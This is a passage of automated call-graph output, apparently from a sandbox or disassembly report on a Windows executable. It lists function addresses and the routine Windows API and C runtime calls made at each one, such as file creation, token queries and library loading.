calls 18745->18746 18746->18745 18746->18747 18747->18742 18799 7ff78c9c028c 18748->18799 18752 7ff78c9c4972 18751->18752 18753 7ff78c9c00f8 12 API calls 18752->18753 18754 7ff78c9c49ba 18753->18754 18755 7ff78c9cf5d8 46 API calls 18754->18755 18756 7ff78c9c4a8d 18755->18756 18757 7ff78c9c5210 45 API calls 18756->18757 18759 7ff78c9c4aaf 18756->18759 18757->18759 18758 7ff78c9c5210 45 API calls 18760 7ff78c9c4b38 18758->18760 18759->18758 18759->18759 18759->18760 18760->18716 18762 7ff78c9c4e24 18761->18762 18764 7ff78c9c4e8c 18761->18764 18763 7ff78c9cf8c0 47 API calls 18762->18763 18762->18764 18763->18764 18764->18716 18766 7ff78c9c10fb 18765->18766 18767 7ff78c9c112a 18766->18767 18769 7ff78c9c11e7 18766->18769 18768 7ff78c9c00f8 12 API calls 18767->18768 18771 7ff78c9c1167 18767->18771 18768->18771 18770 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18769->18770 18770->18771 18771->18716 18773 7ff78c9c0ceb 18772->18773 18774 7ff78c9c0d1a 18773->18774 18776 7ff78c9c0dd7 18773->18776 18775 7ff78c9c00f8 12 API calls 18774->18775 18778 7ff78c9c0d57 18774->18778 18775->18778 18777 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18776->18777 18777->18778 18778->18716 18780 7ff78c9c150b 18779->18780 18781 7ff78c9c153a 18780->18781 18783 7ff78c9c15f7 18780->18783 18782 7ff78c9c00f8 12 API calls 18781->18782 18785 7ff78c9c1577 18781->18785 18782->18785 18784 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18783->18784 18784->18785 18785->18716 18787 7ff78c9cf8e8 18786->18787 18788 7ff78c9cf92d 18787->18788 18789 7ff78c9c5210 45 API calls 18787->18789 18793 7ff78c9cf8ed memcpy_s 18787->18793 18795 7ff78c9cf916 memcpy_s 18787->18795 18788->18793 18788->18795 18796 7ff78c9d19f8 18788->18796 18789->18788 18790 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18790->18793 18793->18716 18795->18790 18795->18793 18797 7ff78c9d1a1c WideCharToMultiByte 18796->18797 18800 7ff78c9c02b9 18799->18800 18801 7ff78c9c02cb 18799->18801 18802 7ff78c9c5de8 _set_fmode 11 API calls 18800->18802 18803 7ff78c9c0315 18801->18803 18805 7ff78c9c02d8 18801->18805 18804 7ff78c9c02be 18802->18804 18808 7ff78c9c03be 18803->18808 18809 7ff78c9c5de8 _set_fmode 11 API calls 18803->18809 18807 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18804->18807 18806 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18805->18806 18811 7ff78c9c02c9 18806->18811 18807->18811 18810 7ff78c9c5de8 _set_fmode 11 API calls 18808->18810 18808->18811 18812 7ff78c9c03b3 18809->18812 18813 7ff78c9c0468 18810->18813 18811->18686 18814 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18812->18814 18815 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18813->18815 18814->18808 18815->18811 18821 7ff78c9cfe49 18816->18821 18817 7ff78c9cfe4e 18818 7ff78c9c5de8 _set_fmode 11 API calls 18817->18818 18819 7ff78c9c60bd 18817->18819 18820 7ff78c9cfe58 18818->18820 18819->18648 18819->18655 18822 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 18820->18822 18821->18817 18821->18819 18823 7ff78c9cfe98 18821->18823 18822->18819 18823->18819 18824 7ff78c9c5de8 _set_fmode 11 API calls 18823->18824 18824->18820 18830 7ff78c9cff1c 18825->18830 18828 7ff78c9d02d5 InitializeCriticalSectionAndSpinCount 18829 7ff78c9d02bb 18828->18829 18829->18665 18831 7ff78c9cff79 18830->18831 18838 7ff78c9cff74 __vcrt_FlsAlloc 18830->18838 18831->18828 18831->18829 18832 7ff78c9cffa9 LoadLibraryExW 18834 7ff78c9d007e 18832->18834 18835 7ff78c9cffce GetLastError 18832->18835 18833 7ff78c9d009e GetProcAddress 18833->18831 18837 7ff78c9d00af 18833->18837 18834->18833 18836 7ff78c9d0095 FreeLibrary 18834->18836 18835->18838 18836->18833 18837->18831 18838->18831 18838->18832 18838->18833 18839 7ff78c9d0008 LoadLibraryExW 18838->18839 18839->18834 18839->18838 18841 7ff78c9b1dd6 18840->18841 18844 7ff78c9c561c 18841->18844 18843 7ff78c9b1dec 18843->18675 18846 7ff78c9c5646 18844->18846 18845 7ff78c9c567e 18848 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 18845->18848 18846->18845 18847 7ff78c9c56b1 18846->18847 18851 7ff78c9c00b8 18847->18851 18850 7ff78c9c56a7 18848->18850 18850->18843 18858 7ff78c9c627c EnterCriticalSection 18851->18858 18860 7ff78c9b7a01 GetTokenInformation 18859->18860 18862 7ff78c9b7a83 __std_exception_copy 18859->18862 18861 7ff78c9b7a22 GetLastError 18860->18861 18863 7ff78c9b7a2d 18860->18863 18861->18862 18861->18863 18864 7ff78c9b7a96 CloseHandle 18862->18864 18865 7ff78c9b7a9c 18862->18865 18863->18862 18866 7ff78c9b7a49 GetTokenInformation 18863->18866 18864->18865 18865->17928 18866->18862 18867 7ff78c9b7a6c 18866->18867 18867->18862 18868 7ff78c9b7a76 ConvertSidToStringSidW 18867->18868 18868->18862 18870 7ff78c9bbdb0 18869->18870 18871 7ff78c9b2244 GetCurrentProcessId 18870->18871 18872 7ff78c9b1d50 48 API calls 18871->18872 18873 7ff78c9b2295 18872->18873 19075 7ff78c9b727e 19073->19075 19137 7ff78c9b35c1 19136->19137 19354 7ff78c9c6e28 19353->19354 19355 7ff78c9c6e4e 19354->19355 19357 7ff78c9c6e81 19354->19357 19356 7ff78c9c5de8 _set_fmode 11 API calls 19355->19356 19358 7ff78c9c6e53 19356->19358 19359 7ff78c9c6e94 19357->19359 19360 7ff78c9c6e87 19357->19360 19361 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 19358->19361 19372 7ff78c9cbad0 19359->19372 19362 7ff78c9c5de8 _set_fmode 11 API calls 19360->19362 19364 7ff78c9b3a36 19361->19364 19362->19364 19364->18016 19385 7ff78c9d14e8 EnterCriticalSection 19372->19385 19745 7ff78c9c87d4 19744->19745 19748 7ff78c9c82b0 19745->19748 19747 7ff78c9c87ed 19747->18026 19749 7ff78c9c82cb 19748->19749 19750 7ff78c9c82fa 19748->19750 19751 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 19749->19751 19758 7ff78c9c627c EnterCriticalSection 19750->19758 19757 7ff78c9c82eb 19751->19757 19757->19747 19760 7ff78c9bf33b 19759->19760 19762 7ff78c9bf369 19759->19762 19761 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 19760->19761 19763 7ff78c9bf35b 19761->19763 19762->19763 19769 7ff78c9c627c EnterCriticalSection 19762->19769 19763->18030 20166 7ff78c9cbff0 __GetCurrentState 45 API calls 20165->20166 20167 7ff78c9cb301 20166->20167 20168 7ff78c9cb3ac __GetCurrentState 45 API calls 20167->20168 20169 7ff78c9cb321 20168->20169 20531 7ff78c9bc0b0 20532 7ff78c9bc0c0 20531->20532 20548 7ff78c9caa80 20532->20548 20534 7ff78c9bc0cc 20554 7ff78c9bc3b8 20534->20554 20536 7ff78c9bc69c 7 API calls 20538 7ff78c9bc165 20536->20538 20537 7ff78c9bc0e4 _RTC_Initialize 20546 7ff78c9bc139 20537->20546 20559 7ff78c9bc568 20537->20559 20540 7ff78c9bc0f9 20562 7ff78c9c9ef0 20540->20562 20546->20536 20547 7ff78c9bc155 20546->20547 20549 7ff78c9caa91 20548->20549 20550 7ff78c9caa99 20549->20550 20551 7ff78c9c5de8 _set_fmode 11 API calls 20549->20551 20550->20534 20552 7ff78c9caaa8 20551->20552 20553 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 20552->20553 20553->20550 20555 7ff78c9bc3c9 20554->20555 20558 7ff78c9bc3ce __scrt_acquire_startup_lock 20554->20558 20556 7ff78c9bc69c 7 API calls 20555->20556 20555->20558 20557 7ff78c9bc442 20556->20557 20558->20537 20587 7ff78c9bc52c 20559->20587 20561 7ff78c9bc571 20561->20540 20563 7ff78c9c9f10 20562->20563 20569 7ff78c9bc105 20562->20569 20564 7ff78c9c9f2e GetModuleFileNameW 20563->20564 20565 7ff78c9c9f18 20563->20565 20570 7ff78c9c9f59 20564->20570 20566 7ff78c9c5de8 _set_fmode 11 API calls 20565->20566 20567 7ff78c9c9f1d 20566->20567 20568 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 20567->20568 20568->20569 20569->20546 20586 7ff78c9bc63c InitializeSListHead 20569->20586 20602 7ff78c9c9e90 20570->20602 20573 7ff78c9c9fa1 20574 7ff78c9c5de8 _set_fmode 11 API calls 20573->20574 20575 7ff78c9c9fa6 20574->20575 20576 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20575->20576 20576->20569 20577 7ff78c9c9fb9 20578 7ff78c9c9fdb 20577->20578 20580 7ff78c9ca020 20577->20580 20581 7ff78c9ca007 20577->20581 20579 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20578->20579 20579->20569 20583 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20580->20583 20582 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20581->20582 20584 7ff78c9ca010 20582->20584 20583->20578 20585 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20584->20585 20585->20569 20588 7ff78c9bc546 20587->20588 20590 7ff78c9bc53f 20587->20590 20591 7ff78c9cb10c 20588->20591 20590->20561 20594 7ff78c9cad48 20591->20594 20601 7ff78c9d14e8 EnterCriticalSection 20594->20601 20603 7ff78c9c9ea8 20602->20603 20604 7ff78c9c9ee0 20602->20604 20603->20604 20605 7ff78c9cfda4 _set_fmode 11 API calls 20603->20605 20604->20573 20604->20577 20606 7ff78c9c9ed6 20605->20606 20607 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20606->20607 20607->20604 17087 7ff78c9c6584 17088 7ff78c9c659e 17087->17088 17089 7ff78c9c65bb 17087->17089 17138 7ff78c9c5dc8 17088->17138 17089->17088 17091 7ff78c9c65ce CreateFileW 17089->17091 17093 7ff78c9c6602 17091->17093 17094 7ff78c9c6638 17091->17094 17112 7ff78c9c66d8 GetFileType 17093->17112 17144 7ff78c9c6b60 17094->17144 17096 7ff78c9c5de8 _set_fmode 11 API calls 17099 7ff78c9c65ab 17096->17099 17141 7ff78c9cb7c4 17099->17141 17101 7ff78c9c6641 17165 7ff78c9c5d5c 17101->17165 17102 7ff78c9c666c 17170 7ff78c9c6920 17102->17170 17104 7ff78c9c6617 CloseHandle 17107 7ff78c9c65b6 17104->17107 17105 7ff78c9c662d CloseHandle 17105->17107 17111 7ff78c9c664b 17111->17107 17113 7ff78c9c67e3 17112->17113 17115 7ff78c9c6726 17112->17115 17116 7ff78c9c680d 17113->17116 17117 7ff78c9c67eb 17113->17117 17114 7ff78c9c6752 GetFileInformationByHandle 17120 7ff78c9c67fe GetLastError 17114->17120 17121 7ff78c9c677b 17114->17121 17115->17114 17119 7ff78c9c6a5c 21 API calls 17115->17119 17118 7ff78c9c6830 PeekNamedPipe 17116->17118 17137 7ff78c9c67ce 17116->17137 17117->17120 17122 7ff78c9c67ef 17117->17122 17118->17137 17124 7ff78c9c6740 17119->17124 17123 7ff78c9c5d5c _fread_nolock 11 API calls 17120->17123 17125 7ff78c9c6920 51 API calls 17121->17125 17126 7ff78c9c5de8 _set_fmode 11 API calls 17122->17126 17123->17137 17124->17114 17124->17137 17128 7ff78c9c6786 17125->17128 17126->17137 17187 7ff78c9c6880 17128->17187 17132 7ff78c9c6880 10 API calls 17133 7ff78c9c67a5 17132->17133 17134 7ff78c9c6880 10 API calls 17133->17134 17135 7ff78c9c67b6 17134->17135 17136 7ff78c9c5de8 _set_fmode 11 API calls 17135->17136 17135->17137 17136->17137 17194 7ff78c9bbab0 17137->17194 17139 7ff78c9cc168 _set_fmode 11 API calls 17138->17139 17140 7ff78c9c5dd1 17139->17140 17140->17096 17208 7ff78c9cb65c 17141->17208 17143 7ff78c9cb7dd 17143->17107 17145 7ff78c9c6b96 17144->17145 17146 7ff78c9c5de8 _set_fmode 11 API calls 17145->17146 17164 7ff78c9c6c2e __std_exception_copy 17145->17164 17148 7ff78c9c6ba8 17146->17148 17147 7ff78c9bbab0 _log10_special 8 API calls 17149 7ff78c9c663d 17147->17149 17150 7ff78c9c5de8 _set_fmode 11 API calls 17148->17150 17149->17101 17149->17102 17151 7ff78c9c6bb0 17150->17151 17260 7ff78c9c8ce4 17151->17260 17153 7ff78c9c6bc5 17154 7ff78c9c6bd7 17153->17154 17155 7ff78c9c6bcd 17153->17155 17157 7ff78c9c5de8 _set_fmode 11 API calls 17154->17157 17156 7ff78c9c5de8 _set_fmode 11 API calls 17155->17156 17161 7ff78c9c6bd2 17156->17161 17158 7ff78c9c6bdc 17157->17158 17159 7ff78c9c5de8 _set_fmode 11 API calls 17158->17159 17158->17164 17160 7ff78c9c6be6 17159->17160 17162 7ff78c9c8ce4 45 API calls 17160->17162 17163 7ff78c9c6c20 GetDriveTypeW 17161->17163 17161->17164 17162->17161 17163->17164 17164->17147 17166 7ff78c9cc168 _set_fmode 11 API calls 17165->17166 17167 7ff78c9c5d69 Concurrency::details::SchedulerProxy::DeleteThis 17166->17167 17168 7ff78c9cc168 _set_fmode 11 API calls 17167->17168 17169 7ff78c9c5d8b 17168->17169 17169->17111 17172 7ff78c9c6948 17170->17172 17171 7ff78c9c6679 17180 7ff78c9c6a5c 17171->17180 17172->17171 17354 7ff78c9d0934 17172->17354 17174 7ff78c9c69dc 17174->17171 17175 7ff78c9d0934 51 API calls 17174->17175 17176 7ff78c9c69ef 17175->17176 17176->17171 17177 7ff78c9d0934 51 API calls 17176->17177 17178 7ff78c9c6a02 17177->17178 17178->17171 17179 7ff78c9d0934 51 API calls 17178->17179 17179->17171 17181 7ff78c9c6a76 17180->17181 17182 7ff78c9c6aad 17181->17182 17183 7ff78c9c6a86 17181->17183 17184 7ff78c9d07c8 21 API calls 17182->17184 17185 7ff78c9c5d5c _fread_nolock 11 API calls 17183->17185 17186 7ff78c9c6a96 17183->17186 17184->17186 17185->17186 17186->17111 17188 7ff78c9c68a9 FileTimeToSystemTime 17187->17188 17189 7ff78c9c689c 17187->17189 17190 7ff78c9c68bd SystemTimeToTzSpecificLocalTime 17188->17190 17191 7ff78c9c68a4 17188->17191 17189->17188 17189->17191 17190->17191 17192 7ff78c9bbab0 _log10_special 8 API calls 17191->17192 17193 7ff78c9c6795 17192->17193 17193->17132 17195 7ff78c9bbab9 17194->17195 17196 7ff78c9bbac4 17195->17196 17197 7ff78c9bbe40 IsProcessorFeaturePresent 17195->17197 17196->17104 17196->17105 17198 7ff78c9bbe58 17197->17198 17203 7ff78c9bc038 RtlCaptureContext 17198->17203 17204 7ff78c9bc052 RtlLookupFunctionEntry 17203->17204 17205 7ff78c9bbe6b 17204->17205 17206 7ff78c9bc068 RtlVirtualUnwind 17204->17206 17207 7ff78c9bbe00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17205->17207 17206->17204 17206->17205 17209 7ff78c9cb687 17208->17209 17212 7ff78c9cb6f8 17209->17212 17211 7ff78c9cb6ae 17211->17143 17222 7ff78c9cb440 17212->17222 17217 7ff78c9cb733 17217->17211 17223 7ff78c9cb45c GetLastError 17222->17223 17224 7ff78c9cb497 17222->17224 17225 7ff78c9cb46c 17223->17225 17224->17217 17228 7ff78c9cb4ac 17224->17228 17235 7ff78c9cc230 17225->17235 17229 7ff78c9cb4e0 17228->17229 17230 7ff78c9cb4c8 GetLastError SetLastError 17228->17230 17229->17217 17231 7ff78c9cb7e4 IsProcessorFeaturePresent 17229->17231 17230->17229 17232 7ff78c9cb7f7 17231->17232 17252 7ff78c9cb4f8 17232->17252 17236 7ff78c9cc24f FlsGetValue 17235->17236 17237 7ff78c9cc26a FlsSetValue 17235->17237 17239 7ff78c9cc264 17236->17239 17240 7ff78c9cb487 SetLastError 17236->17240 17238 7ff78c9cc277 17237->17238 17237->17240 17241 7ff78c9cfda4 _set_fmode 11 API calls 17238->17241 17239->17237 17240->17224 17242 7ff78c9cc286 17241->17242 17243 7ff78c9cc2a4 FlsSetValue 17242->17243 17244 7ff78c9cc294 FlsSetValue 17242->17244 17246 7ff78c9cc2b0 FlsSetValue 17243->17246 17247 7ff78c9cc2c2 17243->17247 17245 7ff78c9cc29d 17244->17245 17248 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17245->17248 17246->17245 17249 7ff78c9cbd9c _set_fmode 11 API calls 17247->17249 17248->17240 17250 7ff78c9cc2ca 17249->17250 17251 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17250->17251 17251->17240 17253 7ff78c9cb532 __GetCurrentState memcpy_s 17252->17253 17254 7ff78c9cb55a RtlCaptureContext RtlLookupFunctionEntry 17253->17254 17255 7ff78c9cb594 RtlVirtualUnwind 17254->17255 17256 7ff78c9cb5ca IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17254->17256 17255->17256 17257 7ff78c9cb61c __GetCurrentState 17256->17257 17258 7ff78c9bbab0 _log10_special 8 API calls 17257->17258 17259 7ff78c9cb63b GetCurrentProcess TerminateProcess 17258->17259 17261 7ff78c9c8d00 17260->17261 17262 7ff78c9c8d6e 17260->17262 17261->17262 17264 7ff78c9c8d05 17261->17264 17297 7ff78c9d19d0 17262->17297 17265 7ff78c9c8d1d 17264->17265 17266 7ff78c9c8d3a 17264->17266 17272 7ff78c9c8ab4 GetFullPathNameW 17265->17272 17280 7ff78c9c8b28 GetFullPathNameW 17266->17280 17271 7ff78c9c8d32 __std_exception_copy 17271->17153 17273 7ff78c9c8af0 17272->17273 17274 7ff78c9c8ada GetLastError 17272->17274 17276 7ff78c9c8aec 17273->17276 17279 7ff78c9c5de8 _set_fmode 11 API calls 17273->17279 17275 7ff78c9c5d5c _fread_nolock 11 API calls 17274->17275 17277 7ff78c9c8ae7 17275->17277 17276->17271 17278 7ff78c9c5de8 _set_fmode 11 API calls 17277->17278 17278->17276 17279->17276 17281 7ff78c9c8b5b GetLastError 17280->17281 17285 7ff78c9c8b71 __std_exception_copy 17280->17285 17282 7ff78c9c5d5c _fread_nolock 11 API calls 17281->17282 17283 7ff78c9c8b68 17282->17283 17284 7ff78c9c5de8 _set_fmode 11 API calls 17283->17284 17286 7ff78c9c8b6d 17284->17286 17285->17286 17287 7ff78c9c8bcb GetFullPathNameW 17285->17287 17288 7ff78c9c8c00 17286->17288 17287->17281 17287->17286 17292 7ff78c9c8c74 memcpy_s 17288->17292 17293 7ff78c9c8c29 memcpy_s 17288->17293 17289 7ff78c9c8c5d 17290 7ff78c9c5de8 _set_fmode 11 API calls 17289->17290 17291 7ff78c9c8c62 17290->17291 17294 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17291->17294 17292->17271 17293->17289 17293->17292 17295 7ff78c9c8c96 17293->17295 17294->17292 17295->17292 17296 7ff78c9c5de8 _set_fmode 11 API calls 17295->17296 17296->17291 17300 7ff78c9d17e0 17297->17300 17301 7ff78c9d1822 17300->17301 17302 7ff78c9d180b 17300->17302 17304 7ff78c9d1826 17301->17304 17305 7ff78c9d1847 17301->17305 17303 7ff78c9c5de8 _set_fmode 11 API calls 17302->17303 17307 7ff78c9d1810 17303->17307 17326 7ff78c9d194c 17304->17326 17338 7ff78c9d07c8 17305->17338 17311 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17307->17311 17309 7ff78c9d184c 17314 7ff78c9d18f1 17309->17314 17321 7ff78c9d1873 17309->17321 17322 7ff78c9d181b __std_exception_copy 17311->17322 17312 7ff78c9d182f 17313 7ff78c9c5dc8 _fread_nolock 11 API calls 17312->17313 17315 7ff78c9d1834 17313->17315 17314->17302 17316 7ff78c9d18f9 17314->17316 17318 7ff78c9c5de8 _set_fmode 11 API calls 17315->17318 17319 7ff78c9c8ab4 13 API calls 17316->17319 17317 7ff78c9bbab0 _log10_special 8 API calls 17320 7ff78c9d1941 17317->17320 17318->17307 17319->17322 17320->17271 17323 7ff78c9c8b28 14 API calls 17321->17323 17322->17317 17324 7ff78c9d18b7 17323->17324 17324->17322 17325 7ff78c9c8c00 37 API calls 17324->17325 17325->17322 17327 7ff78c9d1996 17326->17327 17328 7ff78c9d1966 17326->17328 17329 7ff78c9d19a1 GetDriveTypeW 17327->17329 17330 7ff78c9d1981 17327->17330 17331 7ff78c9c5dc8 _fread_nolock 11 API calls 17328->17331 17329->17330 17333 7ff78c9bbab0 _log10_special 8 API calls 17330->17333 17332 7ff78c9d196b 17331->17332 17334 7ff78c9c5de8 _set_fmode 11 API calls 17332->17334 17335 7ff78c9d182b 17333->17335 17336 7ff78c9d1976 17334->17336 17335->17309 17335->17312 17337 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17336->17337 17337->17330 17352 7ff78c9db6e0 17338->17352 17341 7ff78c9d0815 17344 7ff78c9bbab0 _log10_special 8 API calls 17341->17344 17342 7ff78c9d083c 17343 7ff78c9cfda4 _set_fmode 11 API calls 17342->17343 17345 7ff78c9d084b 17343->17345 17346 7ff78c9d08a9 17344->17346 17347 7ff78c9d0864 17345->17347 17348 7ff78c9d0855 GetCurrentDirectoryW 17345->17348 17346->17309 17350 7ff78c9c5de8 _set_fmode 11 API calls 17347->17350 17348->17347 17349 7ff78c9d0869 17348->17349 17351 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17349->17351 17350->17349 17351->17341 17353 7ff78c9d07fe GetCurrentDirectoryW 17352->17353 17353->17341 17353->17342 17355 7ff78c9d0941 17354->17355 17356 7ff78c9d0965 17354->17356 17355->17356 17357 7ff78c9d0946 17355->17357 17359 7ff78c9d099f 17356->17359 17360 7ff78c9d09be 17356->17360 17358 7ff78c9c5de8 _set_fmode 11 API calls 17357->17358 17361 7ff78c9d094b 17358->17361 17362 7ff78c9c5de8 _set_fmode 11 API calls 17359->17362 17371 7ff78c9c5e2c 17360->17371 17364 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17361->17364 17365 7ff78c9d09a4 17362->17365 17366 7ff78c9d0956 17364->17366 17367 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17365->17367 17366->17174 17369 7ff78c9d09af 17367->17369 17368 7ff78c9d09cb 17368->17369 17370 7ff78c9d16ec 51 API calls 17368->17370 17369->17174 17370->17368 17372 7ff78c9c5e50 17371->17372 17373 7ff78c9c5e4b 17371->17373 17372->17373 17379 7ff78c9cbff0 GetLastError 17372->17379 17373->17368 17380 7ff78c9cc014 FlsGetValue 17379->17380 17381 7ff78c9cc031 FlsSetValue 17379->17381 17382 7ff78c9cc021 17380->17382 17383 7ff78c9cc02b 17380->17383 17381->17382 17384 7ff78c9cc043 17381->17384 17385 7ff78c9cc09d SetLastError 17382->17385 17383->17381 17386 7ff78c9cfda4 _set_fmode 11 API calls 17384->17386 17388 7ff78c9cc0bd 17385->17388 17389 7ff78c9c5e6b 17385->17389 17387 7ff78c9cc052 17386->17387 17390 7ff78c9cc070 FlsSetValue 17387->17390 17391 7ff78c9cc060 FlsSetValue 17387->17391 17409 7ff78c9cb3ac 17388->17409 17401 7ff78c9ce9ec 17389->17401 17394 7ff78c9cc07c FlsSetValue 17390->17394 17395 7ff78c9cc08e 17390->17395 17393 7ff78c9cc069 17391->17393 17397 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17393->17397 17394->17393 17398 7ff78c9cbd9c _set_fmode 11 API calls 17395->17398 17397->17382 17399 7ff78c9cc096 17398->17399 17400 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17399->17400 17400->17385 17402 7ff78c9c5e8e 17401->17402 17403 7ff78c9cea01 17401->17403 17405 7ff78c9cea58 17402->17405 17403->17402 17453 7ff78c9d4514 17403->17453 17406 7ff78c9cea80 17405->17406 17407 7ff78c9cea6d 17405->17407 17406->17373 17407->17406 17466 7ff78c9d3860 17407->17466 17418 7ff78c9d4860 17409->17418 17444 7ff78c9d4818 17418->17444 17449 7ff78c9d14e8 EnterCriticalSection 17444->17449 17454 7ff78c9cbff0 __GetCurrentState 45 API calls 17453->17454 17455 7ff78c9d4523 17454->17455 17456 7ff78c9d456e 17455->17456 17465 7ff78c9d14e8 EnterCriticalSection 17455->17465 17456->17402 17467 7ff78c9cbff0 __GetCurrentState 45 API calls 17466->17467 17468 7ff78c9d3869 17467->17468 21636 7ff78c9dbf79 21639 7ff78c9c6288 LeaveCriticalSection 21636->21639 20730 7ff78c9dc00e 20731 7ff78c9dc01d 20730->20731 20732 7ff78c9dc027 20730->20732 20734 7ff78c9d1548 LeaveCriticalSection 20731->20734 20768 7ff78c9d1ad8 20769 7ff78c9d1afc 20768->20769 20771 7ff78c9d1b0c 20768->20771 20770 7ff78c9c5de8 _set_fmode 11 API calls 20769->20770 20790 7ff78c9d1b01 20770->20790 20772 7ff78c9d1dec 20771->20772 20773 7ff78c9d1b2e 20771->20773 20774 7ff78c9c5de8 _set_fmode 11 API calls 20772->20774 20775 7ff78c9d1b4f 20773->20775 20899 7ff78c9d2194 20773->20899 20776 7ff78c9d1df1 20774->20776 20779 7ff78c9d1bc1 20775->20779 20781 7ff78c9d1b75 20775->20781 20786 7ff78c9d1bb5 20775->20786 20778 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20776->20778 20778->20790 20783 7ff78c9cfda4 _set_fmode 11 API calls 20779->20783 20800 7ff78c9d1b84 20779->20800 20780 7ff78c9d1c6e 20789 7ff78c9d1c8b 20780->20789 20797 7ff78c9d1cdd 20780->20797 20914 7ff78c9ca59c 20781->20914 20787 7ff78c9d1bd7 20783->20787 20785 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20785->20790 20786->20780 20786->20800 20920 7ff78c9d833c 20786->20920 20791 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20787->20791 20794 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20789->20794 20795 7ff78c9d1be5 20791->20795 20792 7ff78c9d1b7f 20796 7ff78c9c5de8 _set_fmode 11 API calls 20792->20796 20793 7ff78c9d1b9d 20793->20786 20799 7ff78c9d2194 45 API calls 20793->20799 20798 7ff78c9d1c94 20794->20798 20795->20786 20795->20800 20803 7ff78c9cfda4 _set_fmode 11 API calls 20795->20803 20796->20800 20797->20800 20801 7ff78c9d45ec 40 API calls 20797->20801 20810 7ff78c9d1c99 20798->20810 20956 7ff78c9d45ec 20798->20956 20799->20786 20800->20785 20802 7ff78c9d1d1a 20801->20802 20804 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20802->20804 20806 7ff78c9d1c07 20803->20806 20808 7ff78c9d1d24 20804->20808 20807 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20806->20807 20807->20786 20808->20800 20808->20810 20809 7ff78c9d1de0 20812 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20809->20812 20810->20809 20814 7ff78c9cfda4 _set_fmode 11 API calls 20810->20814 20811 7ff78c9d1cc5 20813 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20811->20813 20812->20790 20813->20810 20815 7ff78c9d1d68 20814->20815 20816 7ff78c9d1d70 20815->20816 20817 7ff78c9d1d79 20815->20817 20819 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20816->20819 20818 7ff78c9cb34c __std_exception_copy 37 API calls 20817->20818 20820 7ff78c9d1d88 20818->20820 20821 7ff78c9d1d77 20819->20821 20822 7ff78c9d1d90 20820->20822 20823 7ff78c9d1e1b 20820->20823 20826 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20821->20826 20965 7ff78c9d8454 20822->20965 20825 7ff78c9cb7e4 _isindst 17 API calls 20823->20825 20828 7ff78c9d1e2f 20825->20828 20826->20790 20831 7ff78c9d1e58 20828->20831 20837 7ff78c9d1e68 20828->20837 20829 7ff78c9d1db7 20832 7ff78c9c5de8 _set_fmode 11 API calls 20829->20832 20830 7ff78c9d1dd8 20834 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20830->20834 20833 7ff78c9c5de8 _set_fmode 11 API calls 20831->20833 20835 7ff78c9d1dbc 20832->20835 20836 7ff78c9d1e5d 20833->20836 20834->20809 20839 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20835->20839 20838 7ff78c9d214b 20837->20838 20840 7ff78c9d1e8a 20837->20840 20841 7ff78c9c5de8 _set_fmode 11 API calls 20838->20841 20839->20821 20842 7ff78c9d1ea7 20840->20842 20984 7ff78c9d227c 20840->20984 20843 7ff78c9d2150 20841->20843 20846 7ff78c9d1f1b 20842->20846 20848 7ff78c9d1ecf 20842->20848 20854 7ff78c9d1f0f 20842->20854 20845 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20843->20845 20845->20836 20850 7ff78c9d1f43 20846->20850 20855 7ff78c9cfda4 _set_fmode 11 API calls 20846->20855 20869 7ff78c9d1ede 20846->20869 20847 7ff78c9d1fce 20857 7ff78c9d1feb 20847->20857 20866 7ff78c9d203e 20847->20866 20999 7ff78c9ca5d8 20848->20999 20852 7ff78c9cfda4 _set_fmode 11 API calls 20850->20852 